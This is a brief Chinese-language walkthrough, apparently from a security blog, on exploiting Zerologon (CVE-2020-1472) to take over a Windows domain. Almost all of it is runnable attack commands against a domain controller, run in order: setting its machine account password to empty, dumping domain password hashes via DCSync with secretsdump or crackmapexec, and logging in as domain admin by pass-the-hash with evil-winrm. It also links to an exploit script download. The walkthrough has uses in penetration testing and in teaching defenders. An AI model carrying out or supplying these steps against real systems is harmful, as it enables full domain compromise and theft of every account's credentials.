一、简介
-
Zerologon
即CVE-2020-1472
,是一种针对于DC
的攻击手法,其利用NetLogon
认证缺陷等因素,可以将DC
的机器账户密码强制变为空,随后即可利用DC
的机器账户进行DCSync
以此获取域内账户的密码哈希,进而使用PTH
的攻击手法获取到域管身份,实现对目标域的接管! -
影响范围:
Windows2008
——Windows2019
-
脚本下载:传送门(解压密码:
gotarget.top
)
二、攻击利用
2.1 验证
python3 zerologon_tester.py dc 192.168.30.149
2.2 密码置空
python3 CVE-2020-1472.py dc dc$ 192.168.30.149
2.3 DCSync
2.3.1 Impacket(推荐)
-
格式:
python3 secretsdump.py 域/计算机名/$@目标IP -just-dc -no-pass
-
示例:
secretsdump.py decade.wsl/dc\$@192.168.30.157 -just-dc -no-pass
2.3.2 CME(备选)
crackmapexec smb 192.168.30.149 -u dc$ -p '' --ntds
2.4 PTH
evil-winrm -i 192.168.30.149 -u administrator -H <域管哈希>
2.5 机器账户添加密码
- 方式一:
python3 restorepassword.py tech/dc@dc -target-ip 192.168.30.149 -hexpass <16进制编码后的域管密码>
- 方式二
- 于
DC
使用域管权限重置:Reset-ComputerMachinePassword -Server dc
- 于
- 注:两种方式都将为机器账户随机创建一个强复杂度密码,因此也就无法使用空密码利用机器账户执行操作了!